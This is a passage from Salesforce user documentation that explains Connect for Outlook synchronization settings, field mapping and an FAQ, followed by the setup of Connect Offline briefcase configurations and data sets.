contact with a Salesforce account or associate a meeting with a Salesforce campaign.

When associating Outlook items with Salesforce records, note the following:

• If you select only one contact to sync and the automatic search feature is enabled, the Account Association is pre-populated
by an automatic search. You enable this feature by selecting the Automatically perform search for account
and contact associations checkbox in Tools > Salesforce Options > Contacts > Advanced > Associations.

• You can select the Remember my selections for my most recent salesforce.com object search
checkbox to direct Salesforce to remember the search results from the last time a contact, task, or event was associated.

• You must select the correct account if the contact's Company field has a value in Outlook. When you associate a contact
with an account using the Accounts tab on the Change Associations dialog box, the selected account appears in one of the
following places:

◊ The contact’s Account Name field in Salesforce
◊ The matching Salesforce field defined in Tools > Salesforce Options > Contacts > Advanced > Field Maps for the

CompanyName Outlook field
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• You must select the correct manager if the contact's Manager's Name field has a value in Outlook. When you associate
a contact with a manager using the Reports To tab on the Change Associations dialog box, the selected manager appears
in one of the following places:

◊ The contact’s Reports To field in Salesforce
◊ The matching Salesforce field defined in Tools > Salesforce Options > Contacts > Advanced > Field Maps for the

ManagerName Outlook field

• The Salesforce Options dialog box lets you set sync preferences using the Always mark for sync checkbox. Select
this checkbox to automatically select the Mark for Sync option on all newly created items of the appropriate type that
you save to your synchronization folder. For example, if you set this option for contacts, any newly created contacts that
you save to the synchronization folder are automatically included the next time you sync with Salesforce. You can exclude
an automatically-marked item from synchronization if you manually unmark it.

Note: Records created or edited on the server or on other devices, such as a Blackberry, won't be marked for sync.

Marking New Outlook Meeting Invitations for Sync

To mark a new meeting invitation for sync:

1. From your Outlook calendar folder, click New to begin a new meeting invitation.
2. Compose the invitation as desired.

Warning:  If you are inviting resources such as conference rooms, those resources must be configured by your
Outlook administrator to automatically accept meeting requests: From the Tools menu, click Options > Calendar
Options > Resource Scheduling and then select the Automatically accept meeting requests and
process cancellations checkbox. If the resource does not have this configuration, it is not booked when
you send the invitation.

3. When you are ready to send the invitation:

• In Outlook XP and 2003, click Save and Mark for Sync on the toolbar.
• In Outlook 2007, click Save and Mark for Sync on the Salesforce tab of the Ribbon.

Note: The version of Connect for Outlook that you have installed may not include all of these features. To upgrade
to the most recent Connect for Outlook version, go to the Connect for Outlook page in your personal settings.

If your administrator renamed any Salesforce standard tab names, the tab names you see in Outlook are different than
those mentioned in these help topics. Also, your administrator may have customized Connect for Outlook to disallow
certain operations such as synchronizing contacts or uploading attachments. If your administrator prohibited a
particular operation, all related commands are disabled in your user interface.

Connect for Outlook version 3.2 and later supports person accounts if they have been implemented in your organization.

See Also:
Setting Your Sync Profile for Connect for Outlook
Mapping Custom Fields for Connect for Outlook Synchronization
Setting Connect for Outlook Options
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Resolving Data Conflicts During Connect for Outlook Synchronization

Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

If a record has been modified in both Outlook and Salesforce and you try to synchronize your data, a conflict resolution dialog
box appears, allowing you to choose which information to save. For example, if you changed a contact’s phone number in
Outlook and then changed that contact’s address in Salesforce, you must identify which values are correct.

1. In the left pane, use the drop-down list to choose whether to display records in a tree or list view, then choose the record
that you want to resolve.

2. In the right pane, use the drop-down list to choose whether to display all fields on the record or only those that have
conflicting data, then select the radio button next to the correct value.

3. If necessary, click the pencil icon ( ) and manually enter the value you want to save.

Note:  The pencil icon is not available for read-only fields on some objects, such as products on opportunities.

4. Repeat these steps for each record listed in the left pane. When you have selected a value to resolve the conflict, the status
of the record in the left pane displays a green check.

5. Click Submit when you have finished making selections for all records in conflict.

See Also:
Synchronizing Your Contacts and Activities with Connect for Outlook

Working with Person Accounts in Connect for Outlook
Available in: Enterprise and Unlimited Editions

Connect for Outlook version 3.2 and later supports the following operations involving person accounts if your organization
has implemented them.

Synchronizing Person Accounts with Outlook Contacts

Connect for Outlook can synchronize person accounts between your Accounts tab in Salesforce and your contacts folder in
Outlook. From Outlook, you can view, edit, and delete synchronized person accounts. You can also direct Outlook to identify
contact records as person accounts. You do this by syncing the contact record to a corresponding person account in Salesforce.
If the contact and person account details match, Salesforce associates the records and marks the Outlook contact as a person
account.

Salesforce only marks the contact record as a person account if a person account already exists in Salesforce. To identify a
contact as a person account, you must first create the person account in Salesforce and then sync the contact record to it. If
you sync a new Outlook contact for someone who doesn’t have a person account in Salesforce, Connect for Outlook processes
it as a business contact.
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Associating Outlook Email Messages with Person Accounts

With Connect for Outlook, you can add email messages to Salesforce as tasks or cases. In both situations you can associate
the task or case being created with a person account. In the Add to Salesforce dialog box, you can select person accounts on
both the Names tab and the Related to tab. On the Names tab, person accounts appear as if they were contacts.

Additionally, you can add outgoing email messages to Salesforce, add sent or received emails to Salesforce, and create cases
from Outlook email messages.

Associating Outlook Calendar Events and Tasks with Person Accounts

With Connect for Outlook, you can associate calendar events and tasks with person accounts. In the Associate Item dialog
box, you can specify person accounts for the Contacts drop-down list as well as the Accounts drop-down list.

Considerations on Using Person Accounts with Connect for Outlook

• Connect for Outlook does not synchronize business accounts (accounts that do not have a person account record type).
• While you can associate Outlook calendar events and tasks with person accounts, you cannot use the Change Associations

dialog box to associate items in your Outlook contacts folder with person accounts. However, you can synchronize existing
person accounts in Salesforce down to Outlook.

• You cannot create new person accounts from Outlook. Whenever you create a new Outlook contact and mark it for sync,
Connect for Outlook processes it as a business contact.

• If person accounts have been enabled for your organization, the Quick Create links for accounts are always disabled in
Connect for Outlook dialog boxes.

See Also:
Using Connect for Outlook
Synchronizing Your Contacts and Activities with Connect for Outlook
Assigning Outlook Items to Salesforce Records with Connect for Outlook

Opening Salesforce Records from Outlook with Salesforce
Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

After synchronizing, Connect for Outlook allows you to open the Salesforce detail page of a contact, task, or nonrecurring
calendar event from Outlook:

1. In Outlook, select a contact, task, or nonrecurring calendar event so the item is highlighted.
2. Click View in Salesforce from the toolbar or the right-click shortcut menu.
3. The Salesforce record opens in your Web browser. Because you are already logged in through Connect for Outlook, you

do not need to enter your username and password again.

Viewing Salesforce Tabs in Outlook

Connect for Outlook allows you to access and work in your Salesforce tabs directly from within Outlook. For example, you
can view and update your Salesforce contacts and accounts directly from Outlook.
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Note:  This feature is only available if you are working online and if the Add salesforce.com folders in
Outlook email option is enabled.

To use Salesforce within Outlook:

1. In your Outlook folders list, expand the “salesforce.com” folder.
2. Click any folder name to display the Salesforce tab of the same name. The Salesforce tab displays in the Outlook reading

pane.

A new browser window opens when you click a Salesforce folder if you're using:

• Outlook 2002 on Windows XP or Vista
• Outlook 2007 on Vista
• Outlook 2003 on Windows XP or Vista, or Outlook 2007 on Windows XP, and have enabled the Display

salesforce.com folders in external Web browser email option

During your Outlook session, clicking the “salesforce.com” folder displays the last Salesforce page you viewed while
navigating within the “salesforce.com” folder.

3. Use Salesforce within Outlook exactly as you would in a browser. All Salesforce features are available to you except the
ability to log out through the Salesforce Logout link.

Note:  We recommend that you do not add any emails, folders, or other items to the “salesforce.com” folder.

See Also:
Synchronizing Your Contacts and Activities with Connect for Outlook

Setting Your Sync Profile for Connect for Outlook
Available in: Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

Your sync profile defines how your data is synchronized with Salesforce.

By default, you can synchronize:

• Contacts you own

• Contacts to which you have read/write access that are associated with accounts you own

• Contacts to which you have read/write access that are associated with accounts of which you are an account team member

By setting your sync profile, you can also synchronize contacts owned by other users, as long as you have read/write access to
those contacts.

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select Desktop Integration > Connect for Outlook > Set your Sync Profile. You can also click
Desktop Integration > Connect for Lotus Notes > Set your Sync Profile.
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• If you clicked My Settings, select Desktop Add-Ons > Connect for Outlook > Set your Sync Profile. You can also
click Desktop Add-Ons > Connect for Lotus Notes > Set your Sync Profile.

Connect for Outlook and Connect for Lotus Notes both use the sync profile.

3. From the first drop-down list, select the type of group.

Your choices are:

DescriptionMember Type

All of your own groups.Personal Groups

All public groups defined by your administrator.Public Groups

4. Select the group whose members own contacts you want to synchronize, or click New Personal Group to create a new
personal group. The group you select or create can have up to 15 members.

Contact Manager and Group Edition organizations have two options: Sync My Contacts Only or Sync All Contacts.

5. Click Save to finish.

In a Public Read Only or Private sharing model, the group members need to grant you read/write access to their contacts
in order for you to synchronize them.

6. The next time you perform a synchronization, the contacts that correspond to your sync profile will be included.

Keep in mind the following concerning your sync profile:

• If you change your sync profile, the contacts owned by the new group are added to your offline device and the contacts
owned by the old group are deleted from your offline device during your next synchronization.

• If the members of the group change, the contacts that are synchronized also change.

• If you or your administrator delete the group, contacts owned by the group will no longer be synchronized unless you are
the contact owner, the account owner, or on the account team.

See Also:
Synchronizing Your Contacts and Activities with Connect for Outlook

Setting Connect for Outlook Options
Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

To customize your Connect for Outlook options:

1. In Outlook, select Tools > Salesforce Options. The Connect for Outlook Configuration Options dialog box opens.
2. Use the tabs provided to view and modify configuration options.
3. Click OK to save your settings.
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Connect for Outlook Configuration Options

In the Outlook Configuration Options dialog box, you can set the following options:

Note:  Your administrator may have customized Connect for Outlook to disallow certain operations. If so, some
options may be unavailable or disabled.

Options on the General tab
User Settings

DescriptionOption

Your Salesforce username.Username

Your Salesforce password. If you log in from an untrusted
network, you may need to add a security key to the end of
your password.

Password

The URL of the Force.com API server that Connect for
Outlook uses to access your Salesforce data. Read only.

Server

Click the Verify button to confirm that your username and password are correct.

General Preferences

DescriptionOption

Select this checkbox to allow Connect for Outlook to
automatically log you in to Salesforce when you start

Log in automatically when Outlook starts

Outlook. This can increase the speed of your first Connect
for Outlook operation during that Outlook session.

Select this checkbox to enable the Connect for Outlook
dialog box that displays when Outlook starts.

Display splash screen on Outlook startup

Select this checkbox to enable icons that indicate different
statuses of Outlook items, such as whether an item is
marked for synchronization or has been synchronized.

Enable visual indicators

Select this checkbox to display a notification dialog box
when Connect for Outlook completes a synchronization.

Display 'Sync completed' dialog

Visual Preferences

DescriptionOption

Select this checkbox to enable the context-sensitive display
of Connect for Outlook toolbar buttons. Selecting this

Enable context-sensitive toolbar buttons

option may impact Outlook performance. When this option
is selected, the toolbar and right-click shortcut menu only
offer the commands that are relevant to your current
location in Outlook. When this option is deselected, all
commands always display; a warning message occurs if you
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DescriptionOption

select a command that does not apply to your current
Outlook context.

Show or hide the text labels that display next to Connect
for Outlook toolbar buttons. By hiding the text, the toolbar
will be shorter and take up less screen space.

Display text in toolbar buttons

Synchronization Preferences

DescriptionOption

Select this checkbox to remove your synchronization history.
Your next synchronization will take place as if you had

Delete history and synchronize from scratch

never before synchronized any records. When you select
this option, Connect for Outlook removes the synchronized
icons from all items that were previously synchronized.

Select this checkbox and choose a number from the
drop-down list to enable automatic scheduled
synchronizations every 1-8 hours.

Synchronize on schedule every XX hours

Within the General tab of the Connect for Outlook Options dialog box, click Help to open Connect for Outlook online
help. Click About to view your Connect for Outlook version number.

Basic options on the Contacts, Events, and Tasks tabs
On the Contacts, Events, and Tasks tabs of the dialog box, set each of these options to determine how your contacts,
events, and tasks will be synchronized.

DescriptionOption

Select the checkbox to enable synchronization between
Outlook and Salesforce.

Synchronize Data with Salesforce

Choose an option from the drop-down list to specify how
data is treated during synchronization. Your choices are:

Data Movement

• Export to Salesforce - During its first synchronization,
a record in Outlook will create or update a record in
Salesforce. If that record is ever modified in Salesforce,
it will be skipped in future synchronizations. If the
record is only modified in Outlook, future
synchronizations will cause the corresponding record
in Salesforce to be updated.

• Export with Overwrites to Salesforce - During its first
synchronization, a record in Outlook will create or
update a record in Salesforce. At future
synchronizations, any changes made in Outlook will be
reflected in Salesforce, regardless of whether the
Salesforce version of the record had been changed in
the meantime. When this option is selected, the conflict

1371

Setting Connect for Outlook OptionsUsing Salesforce-Integrated Email



DescriptionOption

setting in the advanced options dialog box is
automatically set to Outlook always wins.

• Import from Salesforce - During its first
synchronization, a record in Salesforce will create or
update a record in Outlook. If that record is ever
modified in Outlook, it will be skipped in future
synchronizations. If the record is only modified in
Salesforce, future synchronizations will cause the
corresponding record in Outlook to be updated.

• Import with overwrites from Salesforce - During its
first synchronization, a record in Salesforce will create
or update a record in Outlook. At future
synchronizations, any changes made in Salesforce will
be reflected in Outlook, regardless of whether the
Outlook version of the record had been changed in the
meantime. When this option is selected, the conflict
setting in the advanced options dialog box is
automatically set to Salesforce always wins.

• Synchronize with Salesforce - During
synchronizations, records modified in Outlook will be
reflected in Salesforce, and vice versa. This is the default
option and is recommended for most users.

Select this checkbox to automatically select the Mark for
Sync option on all newly created items of the appropriate

Always mark for sync

type that you save to your synchronization folder. For
example, if you set this option for contacts, any newly
created contacts that you save to the synchronization folder
are automatically included the next time you sync with
Salesforce. You can exclude an automatically-marked item
from synchronization if you manually unmark it.

Note: Records created or edited on the server or
on other devices, such as a Blackberry, won't be
marked for sync.

View a list of the Outlook folders. Connect for Outlook
searches for items to synchronize in the Outlook folder that

Folder Settings

has Synchronize Data with Salesforce selected.
You can select only one folder. The items themselves must
be marked for synchronization or they will not be
synchronized.

Advanced options on the Contacts, Events, and Tasks tabs
Click the Advanced button in the Contacts, Events, and Tasks tabs of the dialog box to customize additional
synchronization options.
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DescriptionOption

Select the checkbox to display a confirmation message when
records will be deleted as a result of synchronization. This
option is enabled by default.

Confirmation tab - Confirm record deletions

Select the checkbox to display a confirmation message when
records will be updated as a result of synchronization. This
option is enabled by default.

Confirmation tab - Confirm record changes
and additions

In the Conflict tab, select an option to determine how
Connect for Outlook handles conflicts between Salesforce
data and Outlook data during synchronization.

Conflict tab

• Ignore all conflicts - Records with conflicts are not
synchronized.

• Notify me when conflicts occur - Connect for Outlook
notifies you of any conflicts so you can manually resolve
them. This is the default option.

• Salesforce always wins - The value in the Salesforce
record is always accepted when a conflict occurs.

• Outlook always wins - The value in Outlook is always
accepted when a conflict occurs.

Determines time frame for synchronized tasks and events.
This tab is only available for tasks and events.

The choices for events are:

Options tab - Synchronization Scope

• Today and future events - Only current and future
events that are marked for synchronization will be
synchronized. This includes events scheduled for the
day before the synchronization. By default, Salesforce
synchronizes the next 31 days of daily events, the next
5.5 weeks of weekly events, the next 5.5 months of
monthly events, and the next year and a half of yearly
events.

• All events - All events, including past events, that are
marked for synchronization will be synchronized.

The choices for tasks are:

• Open and recently closed tasks - Only open tasks and
tasks completed within the last seven days that are
marked for synchronization will be synchronized.

◊ Import salesforce.com tasks of type Email - Only
available if Open and recently closed tasks is
selected. When this checkbox is deselected, tasks
that have a Type value of “Email” are not imported
into Outlook during synchronization, provided the
field-level security settings of the Type picklist make
the picklist visible for you. The tasks affected by this
option include, but are not limited to, emails that
you have used Connect for Outlook to add to
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DescriptionOption

Salesforce as completed tasks. Note that the Type
picklist must also be included on your task page
layout if you want the picklist to be visible when
viewing task records in Salesforce.

• All tasks - All tasks, regardless of status, that are
marked for synchronization will be synchronized.

The table on this tab displays how Salesforce fields are
mapped to Outlook fields for synchronization and lets you
customize field mapping as needed.

Field Maps tab

Determines the settings in the Change Association dialog
box when users click Change Associations to associate the
Outlook item with a Salesforce record.

The choices for contacts, tasks, and events are:

Associations tab

• Maximum number of search results - Indicates
the maximum number of records returned when user
searches for an association.

• Remember my selections for my most recent
salesforce.com object search - Directs
Salesforce to remember the search results from the last
time the item was associated.

The following option is enabled for contacts only:

• Automatically perform search for account
and contact associations - Enables automatic
searching for Salesforce records when associating
contacts. When a user clicks Change Associations, the
search pre-populates the association if it finds a single
result.

Options on the Email tab
Related To Settings

DescriptionOption

Select the types of records to show by default when
associating an email with a related record. To select all,
select the checkbox in the header row.

Display by Default

Search Settings

DescriptionOption

Enter the number of Salesforce items to show in the search
results when associating emails with a record or finding

Maximum number of search results
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DescriptionOption

names in the Address Book. The maximum number allowed
is 200.

Select the checkbox to automatically search for matching
contacts or leads when adding an email to Salesforce. When

Automatically perform search for adding
email

this setting is disabled, the search field in the Names tab
will still be automatically populated, but the search will not
run until you click Go!.

Email Options

DescriptionOption

Select the checkbox to display a confirmation message when
an email is successfully added to Salesforce.

Display email added successfully dialog

Select the checkbox to automatically display the new task
in your Web browser after adding an email message to
Salesforce.

Show item after adding email

Case Options

DescriptionOption

Select the checkbox to automatically display the new case
in your Web browser after creating a case from an email.

Show item after creating a case

Browser Options

DescriptionOption

Select the checkbox to always open Salesforce records in a
new browser window.

Always use new Web browser

Select the checkbox to allow attachments from emails and
local files on your computer to be uploaded to Salesforce.

Upload attachments

Select the checkbox to display salesforce.com folders in the
Outlook folders list.

A new browser window opens when you click a Salesforce
folder if you're using:

Add salesforce.com folders in Outlook

• Outlook 2002 on Windows XP or Vista
• Outlook 2007 on Vista
• Outlook 2003 on Windows XP or Vista, or Outlook

2007 on Windows XP, and have enabled the Display
salesforce.com folders in external Web
browser email option
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DescriptionOption

Select the checkbox to open an external browser when you
click salesforce.com tabs in the “salesforce.com” folder. This

Display salesforce.com folders in external
Web browser

option is disabled by default. It's only available if the Add
salesforce.com folders in Outlook checkbox is
selected and is only visible for users of Outlook 2003 on
Windows XP or Vista, or Outlook 2007 on Windows XP.

Options on the Log File tab
The Log File tab shows the location of the Connect for Outlook log file. This location cannot be changed.

Click View to open the log file in a text editor. This file contains information about any synchronizations performed in
your current Outlook session. Click Send to send the log file to salesforce.com Customer Support for troubleshooting.
If your log file is blank, you must turn tracing on by modifying the LogMask registry entry.

Options on the User Permissions tab
The User Permissions tab contains settings that an IT administrator can customize when deploying Connect for Outlook
to a group of users.

See Also:
Using Connect for Outlook
Deploying Connect for Outlook System-Wide
Tip sheet: Administering Connect for Outlook

Mapping Custom Fields for Connect for Outlook Synchronization

Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

Field mapping lets you define how Salesforce fields map to Outlook fields during synchronization.

To map custom Salesforce fields to standard or custom Outlook fields for synchronization:

1. Click Tools > Salesforce Options.
2. From the Contacts, Events, or Tasks tabs, click Advanced > Field Maps > New Mapping. Each type of item has a different

field mapping.
3. Choose a field from the Salesforce Field drop-down list. This drop-down list displays the names of all Salesforce

fields that have not yet been mapped.

Warning:  If you map custom fields that are universally required, make sure the universally required fields have
a default value so that users will not encounter errors. Furthermore, avoid mapping custom fields that require
validation by Salesforce in order to be created. For example, if you map a custom field whose values must be
unique, a value that you manually add from your desktop client may result in a uniqueness error during
synchronization.
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4. Choose a field from the Outlook Field drop-down list. This drop-down list displays the names of the standard Outlook
fields for that kind of record.

Note:  Custom Outlook fields do not display in this list. To map a Salesforce field to a custom Outlook field, you
must create the field within this dialog box. Simply type the name of the new field into the Outlook Field
field. The custom Outlook field name must be a single word (no spaces) with only letters and numbers.

5. With very few exceptions, accept the default Conversion field value, “Use salesforce.com type.”

Note:  The following are the only circumstances in which you should change the Conversion field from its
default value:

• If you are mapping a field that represents either a date or a date and time combination, then choose “date” or
“datetime,” respectively.

• If you are mapping a field that represents the urgency of a task, then choose “Priority.”
• If you are mapping a field that represents the status of a task, then choose “Status.”
• If you are mapping a field that represents how other users see this time in your calendar, then choose

“BusyStatus.”

If you change the default value of the Conversion field, the value will display in the Type column when you
view your saved mappings.

6. Leave the Matching score and Nonmatching score fields at 50. Modifying these fields is an advanced customization
that may cause duplicate records to be created.

7. Click OK to save the new mapping.

To change the mapping for a specific field, select it from the list and click Edit Mapping. To delete the mapping for a field,
select it from the list and click Delete Mapping.

See Also:
Setting Connect for Outlook Options

Connect for Outlook FAQ
Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

• Can an administrator block access to Connect for Outlook?

• How do I configure Connect for Outlook with a proxy server?

• How can I increase the search results in Connect for Outlook?

• How can I find cases easily with Connect for Outlook?

• Can I use multiple IMAP or POP3 email accounts with Connect for Outlook?

• Why are some of my items capitalized after synchronizing with Connect for Outlook?

• How does Connect for Outlook find matching accounts when synchronizing contacts?

• How do I uninstall Connect for Outlook?
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Can an administrator block access to Connect for Outlook?
In Enterprise and Unlimited Editions, an administrator can block users’ access to Connect for Outlook.

How do I configure Connect for Outlook with a proxy server?
Connect for Outlook does not support PCs that are configured to automatically detect proxy settings. This means that if you
connect to the Internet through a proxy server, you must manually configure your PC's proxy settings, which will also configure
Connect for Outlook. To begin, ask your IT department for your company's proxy server address and port number.

1. On your PC, select Start > Settings > Control Panel > Internet Options.
2. Select the Connections tab, and click the LAN Settings... button.
3. Select Use a proxy server, and enter your proxy server address and port, such as, webserver:8080 or 64.26.128.255:8080.
4. Click OK.

How can I increase the search results in Connect for Outlook?
In Connect for Outlook, the Maximum number of search results option determines how many records are returned when
you search for matching contacts, leads, or other related records.

If you typically send Outlook emails to multiple users at one time, set this option to a higher number than the default.

Note:  Setting this option to a higher number may cause a longer delay in retrieving matching records.

How can I find cases easily with Connect for Outlook?
To quickly find a case to associate with your Outlook email, we recommend that you search by Case Number, because this
field uniquely identifies a specific case. You can also search by Case Subject or any other case field accessible via the sidebar
search in Salesforce.

To make sure that you always have the case number available, it is a good idea to add the {!Case_Number} field to the Subject
of your Customer Support email templates.

See Also:
Creating Cases from Outlook Emails with Connect for Outlook
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Can I use multiple IMAP or POP3 email accounts with Connect for Outlook?
Yes. However, if you have multiple IMAP or POP3 email accounts and you select your non-default email account for sending
and adding new emails to Salesforce, Connect for Outlook does not use the non-default account you have selected. It always
uses your default IMAP or POP3 email account when you click the Send and Add button.

See Also:
Setting Connect for Outlook Options

Why are some of my items capitalized after synchronizing with Connect
for Outlook?

If you have configured Microsoft Outlook to auto-correct capitalization, your Salesforce data, such as contact or account
names, may become capitalized after synchronization. For example, if you synchronize a contact belonging to the salesforce.com
account, the account name may appear as Salesforce.com after synchronization. To avoid this, you can turn off auto-correct
options within Outlook by choosing Tools > Options > Spelling > AutoCorrect Options....

See Also:
Synchronizing Your Contacts and Activities with Connect for Outlook

How does Connect for Outlook find matching accounts when
synchronizing contacts?

When synchronizing contacts, Connect for Outlook matches the Outlook Company field against the Account Name field
on the contact in Salesforce.

• If Connect for Outlook finds exactly one matching account in Salesforce for that contact, the contact is synchronized under
that account.

• If multiple matching accounts are found in Salesforce for that contact, Connect for Outlook synchronizes the contact under
the account that is first alphabetically. For instance, if your Outlook contact has “IBM” in the Company field and you have
two accounts in Salesforce called “IBM - Europe” and “IBM - US,” the contact will synchronize under the “IBM - Europe”
account.

To prevent accidentally synchronizing an Outlook contact with the wrong account, we recommend that you always make
account name changes in Salesforce, never in Outlook.

See Also:
Synchronizing Your Contacts and Activities with Connect for Outlook
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How do I uninstall Connect for Outlook?
To uninstall Connect for Outlook, use the program removal tool in the Windows Control Panel. Look for the entry “Salesforce
Outlook Edition.”

See Also:
Installing Connect for Outlook

CONNECT OFFLINE

Force.com Connect Offline Overview
Available in: Enterprise, Unlimited, and Developer Editions

Available for an additional cost in: Professional Edition

With Force.com Connect Offline, you can work on your key deals anywhere, any time—totally unplugged.

Connect Offline is a client application that lets you access a subset of Salesforce records using the same browser-based interface
as the online system but without an Internet connection. Use Connect Offline to view, edit, create, and delete accounts,
activities, contacts, opportunities, leads, and custom object records (including relationship groups). You can also add and
update products and schedules on opportunities.

The subset of Salesforce records accessible in Connect Offline is referred to as a briefcase. Administrators can create briefcase
configurations, which are sets of parameters that determine the records available in the briefcases of users with a specific profile.
Organizations can have multiple briefcase configurations and associate each with a different set of profiles to simultaneously
suit the needs of various types of offline users. For example, one configuration might include leads and opportunities in the
briefcases of users with a Sales Representative profile, while another configuration includes accounts and related opportunities
in the briefcases of users with an Account Executive profile. Users without an assigned briefcase configuration can configure
the settings for their own Connect Offline briefcase and can manually select the accounts the briefcase includes.

When online, users can synchronize their Connect Offline briefcases with Salesforce. During synchronization, the changes
to records in the briefcase are implemented in Salesforce, and vice-versa. This ensures that both Salesforce and Connect Offline
have the most current records. If updates to a record in the briefcase conflict with updates to a record in Salesforce, Connect
Offline displays the conflict resolution tool, which allows users to easily resolve the conflict.
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To start using Connect Offline today, log into Salesforce and install the Connect Offline client application.

See Also:
Installing Connect Offline
What is Your Default Connect Offline Briefcase Contents?
Logging in to Connect Offline
Working with Connect Offline

Logging in to Connect Offline
Available in: Enterprise, Unlimited, and Developer Editions

Available for an additional cost in: Professional Edition

User Permissions Needed

“Read” on the appropriate type of record such as accounts,
contacts, or opportunities

To view records in Connect Offline:

“Create,” “Edit,” or “Delete” on the appropriate type of record
such as accounts, contacts, or opportunities

To update records in Connect Offline:

To log in to Connect Offline:

1. On your computer, click Start > Programs > salesforce.com > Connect Offline, or double-click the Connect Offline
desktop icon.

Important:  The first time you log into Connect Offline, you must have an Internet connection.

2. Enter your Salesforce username and password.

Note: If your organization restricts IP addresses, logins from untrusted IPs are blocked until they’re activated.
Salesforce automatically sends you an activation email that you can use to log in. The email contains a security
token that you must add to the end of your password. For example, if your password is mypassword, and your
security token is XXXXXXXXXX, you must enter mypasswordXXXXXXXXXX to log in.

3. Select the Update tab names checkbox if you want Connect Offline to reflect any changes to the names of fields,
objects, and tabs in Salesforce since the last time you selected this option.

Note: Salesforce automatically updates your tabs the first time you log in.

4. Select the Synchronize my data checkbox to synchronize your Connect Offline briefcase with Salesforce.
5. Click Login.
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BRIEFCASE CONFIGURATION

Managing Connect Offline Briefcase Configurations
Available in: Enterprise, Unlimited, and Developer Editions

Available for an additional cost in: Professional Edition

User Permissions Needed

“View Setup and Configuration”To view Connect Offline briefcase configurations:

“Manage Mobile Configurations”To create, change, or delete Connect Offline briefcase
configurations:

Connect Offline briefcase configurations are sets of parameters that determine the records available in the briefcases of both
individual users as well as users with a specific profile. You can create multiple briefcase configurations and associate each with
different users and profiles to simultaneously suit the needs of various types of offline users. For example, one configuration
might include leads and opportunities for sales representatives, while another configuration includes accounts and related
opportunities for account executives.

Users without assigned briefcase configurations see the default briefcase contents and can manually configure settings for their
own Connect Offline briefcase; however, salesforce.com recommends using briefcase configurations instead of allowing users
to manually configure their own offline briefcases because briefcase configurations provide:

• Centralized configuration

• Synchronization with any custom object, as opposed to personal briefcase settings that only support custom objects related
to accounts, contacts, opportunities, or leads

• The ability to define data sets with greater flexibility and filtering capabilities

To manage briefcase configurations for your organization, from Setup, click Desktop Administration > Offline Briefcase
Configurations.

• To create a briefcase configuration, click New Offline Briefcase Configuration.

• To define a data set for an offline briefcase configuration, click the name of the briefcase configuration, then click Edit in
the Data Sets related list.

• To make changes to a briefcase configuration, click Edit.
• To delete a briefcase configuration, click Del.
• To view details about a briefcase configuration, click its name.

• To clone a briefcase configuration, select the briefcase configuration you want to clone and click Clone.

• To activate a briefcase configuration, click Edit next to the configuration you want to activate, select Active, and click
Save.

• To deactivate a briefcase configuration, click Edit next to the configuration you want to activate, deselect Active, and
click Save.
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Important:  If you deactivate an active briefcase configuration, users assigned to that configuration cannot
synchronize their briefcases.

See Also:
What is Your Default Connect Offline Briefcase Contents?

Creating Offline Briefcase Configurations
Available in: Enterprise, Unlimited, and Developer Editions

Available for an additional cost in: Professional Edition

User Permissions Needed

“Manage Mobile Configurations”To create, change, or delete briefcase configurations:

To create a Connect Offline briefcase configuration:

1. From Setup, click Desktop Administration > Offline Briefcase Configurations to access the briefcase configurations list
page.

2. Click New Offline Briefcase Configuration.
3. Enter a name for the briefcase configuration.
4. Select the Active checkbox if you want to activate the briefcase configuration immediately after you create it. The

configuration does not work until you select this checkbox.
5. Enter a description for the briefcase configuration.
6. Select users and profiles from the Available Members box and click the Add arrow to assign them to the briefcase

configuration. If you do not immediately see the user or profile you want to add, enter the profile name in the search box
and click Find. You can assign each user or profile to only one briefcase configuration.

If there are users and profiles in the Assigned Members box you do not want to assign to the briefcase configuration,
select them and click the Remove arrow.

Warning:  If you remove a user or profile from an active briefcase configuration, those users can no longer
synchronize their briefcases to that configuration. The next time the users synchronize, Connect Offline synchronizes
their briefcases with the default briefcase content.

When you assign profiles to a briefcase configuration, the configuration applies to all Connect Offline users with that
profile and overrides users' personal briefcase configurations.

7. Click Save.
8. Also, you must create the data sets for this offline briefcase configuration to determine the data that members of the

configuration receive in their briefcase.
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Note that your offline briefcase configuration is not active until you select the Active checkbox. Also, you must create the
data sets for this briefcase configuration to determine the records that users with this configuration can access in Connect
Offline.

See Also:
Managing Connect Offline Briefcase Configurations
What is Your Default Connect Offline Briefcase Contents?

Defining Connect Offline Data Sets
Available in: Enterprise, Unlimited, and Developer Editions

Available for an additional cost in: Professional Edition

User Permissions Needed

“View Setup and Configuration”To view Connect Offline data sets:

“Manage Mobile Configurations”To create, change, or delete Connect Offline data sets:

Data sets are the parameters in briefcase configurations that determine which records appear in the briefcases of users assigned
to the briefcase configuration. Each data set pertains to records of a single object and is classified by the name of that object.
For example, the Accounts data set only includes account records. Filters and limits within each data set let you further restrict
the records the data set includes.

Data sets can have child data sets for records associated with a top-level (parent) data set. For example, if the first level of your
hierarchy has an Accounts data set, you can add a Contacts child data set for all contact records related to the account records.

A single briefcase configuration can have multiple data sets for the same object and at different levels. For example, you can
have an Events parent data set and an Events child data set under Leads.

After creating a briefcase configuration, define its data sets to specify the records that users can access in Connect Offline if
that briefcase configuration is assigned to their profile. To define the data sets for a briefcase configuration:

1. Click Desktop Administration > Offline Briefcase Configurations, and click the name of the briefcase configuration
you want to modify.

2. In the Data Sets related list, click Edit.
3. From the Data Sets page, you can:

• Add a data set.
• Remove a data set by selecting the data set you want to remove and clicking Remove.
• Edit a data set by selecting the data set you want to edit in the hierarchy. The right pane displays the filters for that

data set.

As you define and modify the data sets, Salesforce automatically saves your changes.
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4. In the Test Data Size section, select a user and click Estimate Data Size to estimate the amount of data the data sets will
synchronize to a user's briefcase. Larger data sets take longer to synchronize and consume more disk space on users'
computers.

Note:  The Select a user field defaults to the name of the user currently logged in; however, it is important
to test the data size for users who will actually be assigned to the briefcase configuration for which you are defining
the data sets.

When the test completes, the Test Data Size section provides data set size summary information, and the data set hierarchy
at the top of the page displays the number of records generated by each data set and the size of each data set. Use these
statistics to identify data sets that might require additional filtering criteria to reduce the size.

